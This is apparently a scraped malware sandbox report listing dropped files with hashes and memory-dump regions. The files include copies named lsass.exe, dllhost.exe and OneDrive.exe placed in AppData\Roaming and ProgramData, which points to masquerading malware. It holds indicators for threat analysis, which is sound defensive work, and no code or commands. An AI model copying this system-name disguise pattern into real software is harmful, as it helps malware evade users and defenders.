C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
28640bbef264e58d9169b7945ba04609

SHA1
42d7ab521cdd7f3ec35ff0f9f86ff4db728b3be3

SHA256
c35a1eeb6eb591836022a5949a181d276736be75054530d82c44c5e4ff239702

SHA512
9add481b594b315878b4bbe52ac81a86b99f734e888db47985040d666267383a5449f8acb97c6795268d4b62ba110765fd69d785fed935b86b27d58224fbf470

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
28640bbef264e58d9169b7945ba04609

SHA1
42d7ab521cdd7f3ec35ff0f9f86ff4db728b3be3

SHA256
c35a1eeb6eb591836022a5949a181d276736be75054530d82c44c5e4ff239702

SHA512
9add481b594b315878b4bbe52ac81a86b99f734e888db47985040d666267383a5449f8acb97c6795268d4b62ba110765fd69d785fed935b86b27d58224fbf470

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
28640bbef264e58d9169b7945ba04609

SHA1
42d7ab521cdd7f3ec35ff0f9f86ff4db728b3be3

SHA256
c35a1eeb6eb591836022a5949a181d276736be75054530d82c44c5e4ff239702

SHA512
9add481b594b315878b4bbe52ac81a86b99f734e888db47985040d666267383a5449f8acb97c6795268d4b62ba110765fd69d785fed935b86b27d58224fbf470

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
28640bbef264e58d9169b7945ba04609

SHA1
42d7ab521cdd7f3ec35ff0f9f86ff4db728b3be3

SHA256
c35a1eeb6eb591836022a5949a181d276736be75054530d82c44c5e4ff239702

SHA512
9add481b594b315878b4bbe52ac81a86b99f734e888db47985040d666267383a5449f8acb97c6795268d4b62ba110765fd69d785fed935b86b27d58224fbf470

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe
Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe
Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe
Filesize
1.6MB

MD5
08e3930a42197a422d064569c4778997

SHA1
74832aa332b48422e5d448f5099b397e84c18712

SHA256
322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813

SHA512
b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe
Filesize
1.6MB

MD5
08e3930a42197a422d064569c4778997

SHA1
74832aa332b48422e5d448f5099b397e84c18712

SHA256
322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813

SHA512
b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

Download Submit
C:\Users\Admin\AppData\Roaming\lsass.exe
Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\??\c:\programdata\lsass\lsass.exe
Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\??\c:\users\admin\appdata\roaming\lsass.exe
Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\ProgramData\lsass\lsass.exe
Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\Users\Admin\AppData\Roaming\OneDrive.exe
Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
memory/428-199-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-215-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-181-0x00000000036D0000-0x0000000003710000-memory.dmp

Filesize
256KB

Download
memory/428-180-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-154-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-195-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-203-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-211-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-164-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-175-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-191-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-166-0x00000000036D0000-0x0000000003710000-memory.dmp

Filesize
256KB

Download
memory/428-187-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-152-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/428-207-0x0000000000D80000-0x00000000011A0000-memory.dmp

Filesize
4.1MB

Download
memory/768-178-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/768-171-0x00000000000B0000-0x00000000000D0000-memory.dmp

Filesize
128KB

Download
memory/768-190-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/768-218-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/768-186-0x00000000003C0000-0x00000000003E0000-memory.dmp

Filesize
128KB

Download
memory/768-176-0x00000000003C0000-0x00000000003E0000-memory.dmp

Filesize
128KB

Download
memory/768-214-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/768-210-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/768-198-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/768-185-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/768-202-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/768-206-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/768-194-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1180-78-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1180-72-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

Filesize
2.9MB

Download
memory/1180-74-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1180-84-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1180-81-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1184-110-0x000000000247B000-0x00000000024B2000-memory.dmp

Filesize
220KB

Download
memory/1184-109-0x0000000002474000-0x0000000002477000-memory.dmp

Filesize
12KB

Download
memory/1260-172-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1260-177-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1400-95-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/1400-89-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/1400-82-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/1400-75-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/1400-85-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/1400-91-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/1400-90-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/1416-54-0x00000000003E0000-0x00000000003FC000-memory.dmp

Filesize
112KB

Download
memory/1536-113-0x000000013FCA0000-0x000000014066A000-memory.dmp

Filesize
9.8MB

Download
memory/1564-141-0x0000000000260000-0x0000000000680000-memory.dmp

Filesize
4.1MB

Download
memory/1564-163-0x0000000007000000-0x0000000007420000-memory.dmp

Filesize
4.1MB

Download
memory/1564-132-0x0000000000260000-0x0000000000680000-memory.dmp

Filesize
4.1MB

Download
memory/1564-179-0x0000000007000000-0x0000000007420000-memory.dmp

Filesize
4.1MB

Download
memory/1564-143-0x0000000002960000-0x00000000029A0000-memory.dmp

Filesize
256KB

Download
memory/1564-161-0x0000000000260000-0x0000000000680000-memory.dmp

Filesize
4.1MB

Download
memory/1664-139-0x0000000002314000-0x0000000002317000-memory.dmp

Filesize
12KB

Download
memory/1664-80-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1664-96-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1664-93-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1664-140-0x000000000231B000-0x0000000002352000-memory.dmp

Filesize
220KB

Download
memory/1664-94-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1664-92-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1664-77-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1696-168-0x000000013F250000-0x000000013FC1A000-memory.dmp

Filesize
9.8MB

Download
memory/1696-170-0x000000013F250000-0x000000013FC1A000-memory.dmp

Filesize
9.8MB

Download
memory/1708-83-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/1708-86-0x000000001B6B0000-0x000000001B6BE000-memory.dmp

Filesize
56KB

Download
memory/1708-87-0x000000001B9F0000-0x000000001BA00000-memory.dmp

Filesize
64KB

Download
memory/1708-79-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/1708-73-0x00000000023A0000-0x00000000023A8000-memory.dmp

Filesize
32KB

Download
memory/1708-76-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2016-192-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-196-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-120-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-200-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-123-0x0000000004240000-0x0000000004241000-memory.dmp

Filesize
4KB

Download
memory/2016-122-0x0000000004220000-0x0000000004221000-memory.dmp

Filesize
4KB

Download
memory/2016-204-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-188-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-121-0x0000000004230000-0x0000000004231000-memory.dmp

Filesize
4KB

Download
memory/2016-208-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-124-0x0000000002170000-0x0000000002171000-memory.dmp

Filesize
4KB

Download
memory/2016-183-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-212-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-165-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-174-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-216-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/2016-173-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download